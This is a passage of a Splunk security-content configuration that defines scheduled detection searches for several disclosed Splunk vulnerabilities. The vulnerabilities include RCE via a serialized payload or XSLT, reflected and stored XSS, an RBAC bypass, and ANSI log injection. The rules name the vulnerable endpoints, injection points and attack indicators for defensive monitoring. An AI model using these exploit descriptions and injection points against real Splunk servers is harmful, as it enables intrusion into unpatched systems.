@splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = None at this time. 
action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Process Injection Forwarder Bundle Downloads - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2022-32157"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` component="PackageDownloadRestHandler" | stats values(app) values(serverclass) by peer, host | `splunk_process_injection_forwarder_bundle_downloads_filter` [ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th, 2022, Splunk released a security advisory relating to TLS validation occuring within the httplib and urllib python libraries shipped with Splunk. In addition to upgrading to Splunk Enterprise 9.0 or later, several configuration settings need to be set. This search will check those configurations on the search head it is run from as well as its search peers. In addition to these settings, the PYTHONHTTPSVERIFY setting in $SPLUNK_HOME/etc/splunk-launch.conf needs to be enabled as well. 
Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1001.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Web"] action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to TLS validation occuring within the httplib and urllib python libraries shipped with Splunk. In addition to upgrading to Splunk Enterprise 9.0 or later, several configuration settings need to be set. This search will check those configurations on the search head it is run from as well as its search peers. In addition to these settings, the PYTHONHTTPSVERIFY setting in $SPLUNK_HOME/etc/splunk-launch.conf needs to be enabled as well. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked. action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (The `dispatch_rest_to_indexers` capability). Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = While all of the settings on each device returned by this search may appear to be hardened, you will still need to verify the value of PYTHONHTTPSVERIFY in $SPLUNK_HOME/etc/splunk-launch.conf on each device in order to harden the python configuration. 
action.escu.creation_date = 2022-05-25 action.escu.modification_date = 2022-05-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Protocol Impersonation Weak Encryption Configuration - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2022-32151"], "impact": 50, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1001.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | rest /services/server/info | table splunk_server version server_roles | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-server/ search="PythonSslClientConfig" | table splunk_server sslVerifyServerCert sslVerifyServerName] | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-web/settings | table splunk_server serverCert sslVersions] | rename sslVerifyServerCert as "Server.conf:PythonSSLClientConfig:sslVerifyServerCert", sslVerifyServerName as "Server.conf:PythonSSLClientConfig:sslVerifyServerName", serverCert as "Web.conf:Settings:serverCert", sslVersions as "Web.conf:Settings:sslVersions" | `splunk_protocol_impersonation_weak_encryption_configuration_filter` [ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule] action.escu = 0 action.escu.enabled = 1 description = On June 14th 2022, 
Splunk released vulnerability advisory addresing Python TLS validation which was not set before Splunk version 9. This search displays events showing WARNING of using Splunk issued default selfsigned certificates. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On June 14th 2022, Splunk released vulnerability advisory addresing Python TLS validation which was not set before Splunk version 9. This search displays events showing WARNING of using Splunk issued default selfsigned certificates. action.escu.how_to_implement = Must upgrade to Splunk version 9 and Configure TLS in order to apply this search. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = This searches finds self signed certificates issued by Splunk which are not recommended from Splunk version 9 forward. 
action.escu.creation_date = 2022-05-26 action.escu.modification_date = 2022-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk protocol impersonation weak encryption selfsigned - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32152"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd` certificate event_message="X509 certificate* should not be used*" | stats count by host CN component log_level | `splunk_protocol_impersonation_weak_encryption_selfsigned_filter` [ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule] action.escu = 0 action.escu.enabled = 1 description = On Splunk version 9 on Python3 client libraries verify server certificates by default and use CA certificate store. This search warns a user about a failure to validate a certificate using python3 request. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = On Splunk version 9 on Python3 client libraries verify server certificates by default and use CA certificate store. 
This search warns a user about a failure to validate a certificate using python3 request. action.escu.how_to_implement = Must upgrade to Splunk version 9 and Configure TLS host name validation for Splunk Python modules in order to apply this search. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks. action.escu.known_false_positives = This search tries to address validation of server and client certificates within Splunk infrastructure, it might produce results from accidental or unintended requests to port 8089. action.escu.creation_date = 2022-05-24 action.escu.modification_date = 2022-05-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk protocol impersonation weak encryption simplerequest - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32152"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1588.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% 
counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunk_python` "simpleRequest SSL certificate validation is enabled without hostname verification" | stats count by host path | `splunk_protocol_impersonation_weak_encryption_simplerequest_filter` [ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = An unauthorized user can use the /services/indexing/preview REST endpoint to overwrite search results if they know the search ID (SID) of an existing search job. action.escu.how_to_implement = This search does not require additional data ingestion. It requires the ability to search _internal index. action.escu.known_false_positives = This is a hunting search which provides verbose results against this endpoint. Operator must consider things such as IP address, useragent and user(specially low privelege) and host to investigate possible attack. 
action.escu.creation_date = 2023-05-10 action.escu.modification_date = 2023-05-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RBAC Bypass On Indexing Preview REST Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` method="POST" uri="*/services/indexing/preview*" | table host clientip status useragent user uri_path | `splunk_rbac_bypass_on_indexing_preview_rest_endpoint_filter` [ESCU - Splunk RCE via Serialized Session Payload - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can execute a specially crafted query that they can then use to serialize untrusted data. The attacker can use the query to execute arbitrary code. The exploit requires the use of the 'collect' SPL command which writes a file within the Splunk Enterprise installation. The attacker can then use this file to submit a serialized payload that can result in execution of code within the payload. 
Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = In Splunk Enterprise versions lower than 8.2.12, 9.0.6, and 9.1.1, an attacker can execute a specially crafted query that they can then use to serialize untrusted data. The attacker can use the query to execute arbitrary code. The exploit requires the use of the 'collect' SPL command which writes a file within the Splunk Enterprise installation. The attacker can then use this file to submit a serialized payload that can result in execution of code within the payload. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com action.escu.how_to_implement = Requires access to the _audit index. action.escu.known_false_positives = There are numerous many uses of the 'makeresults' and 'collect' SPL commands. Please evaluate the results of this search for potential abuse. 
action.escu.creation_date = 2023-10-02 action.escu.modification_date = 2023-10-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via Serialized Session Payload - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via Serialized Session Payload - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-40595"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `audit_searches` file=* (search="*makeresults*" AND search="*collect*") | stats count min(_time) as firstTime max(_time) as lastTime by action file user splunk_server search | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_rce_via_serialized_session_payload_filter` [ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This hunting search provides information on possible exploitation attempts against Splunk Secure Gateway App Mobile Alerts feature in Splunk versions 9.0, 8.2.x, 8.1.x. An authenticated user can run arbitrary operating system commands remotely through the use of specially crafted requests to the mobile alerts feature in the Splunk Secure Gateway app. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This hunting search provides information on possible exploitation attempts against Splunk Secure Gateway App Mobile Alerts feature in Splunk versions 9.0, 8.2.x, 8.1.x. An authenticated user can run arbitrary operating system commands remotely through the use of specially crafted requests to the mobile alerts feature in the Splunk Secure Gateway app. action.escu.how_to_implement = This search only applies if Splunk Mobile Gateway is deployed in the vulnerable Splunk versions. action.escu.known_false_positives = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. Focus of this search is "uri_path=/servicesNS/nobody/splunk_secure_gateway/storage/collections/data/mobile_alerts*" which is the injection point. action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via Splunk Secure Gateway Splunk Mobile alerts feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2022-43567"], "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 
100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkda` uri_path="/servicesNS/nobody/splunk_secure_gateway/storage/collections/data/mobile_alerts*" sort="notification.created_at:-1" | table clientip file host method uri_query sort | `splunk_rce_via_splunk_secure_gateway__splunk_mobile_alerts_feature_filter` [ESCU - Splunk RCE via User XSLT - Rule] action.escu = 0 action.escu.enabled = 1 description = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information to investigate possible remote code execution exploitation via user-supplied Extensible Stylesheet Language Transformations (XSLT), affecting Splunk versions 9.1.x. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This search will provide information for investigation and hunting possible abuse of user-supplied XSLT. There may be false positives and results should individually evaluated. Please evaluate the source IP and useragent responsible for creating the requests. 
action.escu.creation_date = 2023-11-22 action.escu.modification_date = 2023-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk RCE via User XSLT - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk RCE via User XSLT - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_ui` ((uri="*NO_BINARY_CHECK=1*" AND "*input.path=*.xsl*") OR uri="*dispatch*.xsl*") AND uri!= "*splunkd_ui*" | rex field=uri "(?=\s*([\S\s]+))" | eval decoded_field=urldecode(string) | eval action=case(match(status,"200"),"Allowed",match(status,"303|500|401|403|404|301|406"),"Blocked",1=1,"Unknown") | stats count min(_time) as firstTime max(_time) as lastTime by clientip useragent uri decoded_field action host | rename clientip as src, uri as dest_uri | iplocation src | fillnull value="N/A" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime src, useragent, action, count, Country, Region, City, dest_uri, decoded_field [ESCU - Splunk Reflected XSS in the templates lists radio - Rule] action.escu = 0 action.escu.enabled = 1 description = Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected cross site scripting (XSS). 
A View allows for a Reflected Cross Site scripting via JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Splunk versions below 8.1.12,8.2.9 and 9.0.2 are vulnerable to reflected cross site scripting (XSS). A View allows for a Reflected Cross Site scripting via JavaScript Object Notation (JSON) in a query parameter when ouput_mode=radio. action.escu.how_to_implement = This vulnerability only affects instances with Splunk Web enabled. This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. action.escu.known_false_positives = This search may produce false positives as it is difficult to pinpoint all possible XSS injection characters in a single search string. Special attention is required to "en-US/list/entities/x/ui/views" which is the vulnerable injection point. 
action.escu.creation_date = 2022-10-11 action.escu.modification_date = 2022-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Reflected XSS in the templates lists radio - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Splunk Internal Logs"] action.escu.analytic_story = ["Splunk Vulnerabilities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Splunk Reflected XSS in the templates lists radio - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43568"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `splunkd_webx` user=admin status=200 uri=*/lists/entities/x/ui/views* uri_query!=null | stats count earliest(_time) as event_time values(status) as status values(clientip) as clientip by index, sourcetype, _time, host, user, uri | `splunk_reflected_xss_in_the_templates_lists_radio_filter` [ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = In Splunk Enterprise versions below 9.1.1, 9.0.6, and 8.2.12, an attacker can craft a special web request that can result in reflected cross-site scripting XSS on the app search table web endpoint, which presents as the Create Table View page in Splunk Web. Exploitation of this vulnerability can lead to the execution of arbitrary commands on the Splunk platform instance. 
A JavaScript file within this web endpoint does not properly validate input, which lets an attacker insert a payload into a function.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.1.1, 9.0.6, and 8.2.12, an attacker can craft a special web request that can result in reflected cross-site scripting (XSS) on the app search table web endpoint, which presents as the Create Table View page in Splunk Web. Exploitation of this vulnerability can lead to the execution of arbitrary commands on the Splunk platform instance. A JavaScript file within this web endpoint does not properly validate input, which lets an attacker insert a payload into a function.
action.escu.how_to_implement = Need access to the internal indexes.
action.escu.known_false_positives = This search will produce false positives. It is necessary to also look at the uri_query parameter to determine the possible malicious intention of inserting makeresults within the uri string.
action.escu.creation_date = 2023-09-05
action.escu.modification_date = 2023-09-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Reflected XSS on App Search Table Endpoint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_web` (dataset_commands="*makeresults*" AND dataset_commands="*count*" AND dataset_commands="*eval*" AND dataset_commands="*baseSPL*") | stats count min(_time) as firstTime max(_time) as lastTime by clientip status user view root uri_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_reflected_xss_on_app_search_table_endpoint_filter`

[ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for a variety of high-risk commands throughout a number of different Splunk Vulnerability Disclosures. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548", "T1202"], "nist": ["DE.AE"]}
action.escu.data_models = ["Splunk_Audit"]
action.escu.eli5 = This search looks for a variety of high-risk commands throughout a number of different Splunk Vulnerability Disclosures. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com
action.escu.how_to_implement = Requires implementation of the Splunk_Audit.Search_Activity data model.
action.escu.known_false_positives = This search encompasses many commands.
action.escu.creation_date = 2024-01-22
action.escu.modification_date = 2024-01-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk risky Command Abuse disclosed february 2023 - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22931", "CVE-2023-22934", "CVE-2023-22935", "CVE-2023-22936", "CVE-2023-22939", "CVE-2023-22940", "CVE-2023-40598", "CVE-2023-40598", "CVE-2023-46214", "CVE-2024-23676"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548", "T1202"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats fillnull_value="N/A" count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command splunk_risky_command as search output splunk_risky_command description vulnerable_versions CVE other_metadata | where splunk_risky_command != "false" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_risky_command_abuse_disclosed_february_2023_filter`

[ESCU - Splunk Stored XSS via Data Model objectName field - Rule]
action.escu = 0
action.escu.enabled = 1
description = Splunk Enterprise versions 8.1.12, 8.2.9, 9.0.2 are vulnerable to persistent cross-site scripting via Data Model object name. An authenticated user can inject and store arbitrary scripts that can lead to persistent cross-site scripting (XSS) in the object name Data Model.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = Splunk Enterprise versions 8.1.12, 8.2.9, 9.0.2 are vulnerable to persistent cross-site scripting via Data Model object name. An authenticated user can inject and store arbitrary scripts that can lead to persistent cross-site scripting (XSS) in the object name Data Model.
action.escu.how_to_implement = This vulnerability only affects Splunk Web enabled instances. This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index.
action.escu.known_false_positives = This search may produce false positives and does not cover exploitation attempts via code obfuscation; the focus of the search is suspicious requests against "/en-US/splunkd/__raw/servicesNS/*/launcher/datamodel/model", which is the injection point.
action.escu.creation_date = 2022-10-11
action.escu.modification_date = 2022-10-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Stored XSS via Data Model objectName field - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Stored XSS via Data Model objectName field - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43569"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_webx` uri=/en-US/splunkd/__raw/servicesNS/*/launcher/datamodel/model* uri_query!=null | stats count by _time host status clientip user uri | `splunk_stored_xss_via_data_model_objectname_field_filter`

[ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule]
action.escu = 0
action.escu.enabled = 1
description = An attacker can use a specially crafted web URL in their browser to cause log file injection, in which the attacker inserts American National Standards Institute (ANSI) escape codes into specific files using a terminal program that supports those escape codes. The attack requires a terminal program that supports the translation of ANSI escape codes and requires additional user interaction to successfully execute. The following analytic detects potential log injection attempts into the Splunk server.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = An attacker can use a specially crafted web URL in their browser to cause log file injection, in which the attacker inserts American National Standards Institute (ANSI) escape codes into specific files using a terminal program that supports those escape codes. The attack requires a terminal program that supports the translation of ANSI escape codes and requires additional user interaction to successfully execute. The following analytic detects potential log injection attempts into the Splunk server.
action.escu.how_to_implement = This only affects web enabled Splunk instances. The detection does require the ability to search the _internal index.
action.escu.known_false_positives = This hunting search will produce false positives if ANSI escape characters are included in URLs either voluntarily or by accident. This search will not detect obfuscated ANSI characters.
action.escu.creation_date = 2023-07-13
action.escu.modification_date = 2023-07-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Unauthenticated Log Injection Web Service Log - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "cve": ["CVE-2023-32712"], "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd_webx` uri_path IN ("*\x1B*", "*\u001b*", "*\033*", "*\0x9*", "*\0x8*") | stats count by uri_path method host status clientip | `splunk_unauthenticated_log_injection_web_service_log_filter`

